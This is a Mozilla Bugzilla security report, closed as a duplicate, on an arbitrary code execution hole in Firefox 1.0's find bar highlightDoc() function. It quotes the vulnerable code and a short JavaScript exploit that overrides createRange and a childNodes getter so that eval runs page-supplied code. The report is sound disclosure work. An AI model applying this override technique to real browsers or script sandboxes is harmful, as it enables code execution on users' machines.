Closed Bug 289081 Opened 20 years ago Closed 20 years ago

security hole in highlightDoc()

Categories

(Firefox :: Security, defect)

x86
Windows XP
defect
Not set
normal

Tracking

()

RESOLVED DUPLICATE of bug 289074

People

(Reporter: moz_bug_r_a4, Assigned: dveditz)

References

Details

(Whiteboard: [sg:dupe 289074])

Attachments

(1 file)

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2 Vulnerability: arbitrary code execution Vulnerable code: from highlightDoc() in findBar.js win = window._content; var doc = win.document; var body = doc.body; var count = body.childNodes.length; endPt = doc.createRange(); endPt.setStart(body, count); Exploit: Web pages can overwrite the getter and the method, such as the following. usage of |eval| is similar to Bug 289074 eval.setStart = eval.call; eval.__proto__ = document.createRange(); document.createRange = function() { return eval; }; document.body.__defineGetter__('childNodes', function() { return { length : MALICIOUS_CODE }; }); I have confirmed that the following testcase works in: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404 Firefox/1.0.3 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050404 Firefox/1.0+ Reproducible: Always Steps to Reproduce:
Attached file testcase
Status: UNCONFIRMED → NEW
Ever confirmed: true
Blocks: sbb?
Flags: blocking-aviary1.0.3?
Blocks: 289187
Same eval problem as reported in bug 289074. *** This bug has been marked as a duplicate of 289074 *** *** This bug has been marked as a duplicate of 289074 ***
No longer blocks: 289187
Status: NEW → RESOLVED
Closed: 20 years ago
Resolution: --- → DUPLICATE
Whiteboard: [sg:dupe 289074]
Flags: blocking-aviary1.0.3?
Group: security
Blocks: sbb+
No longer blocks: sbb?
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: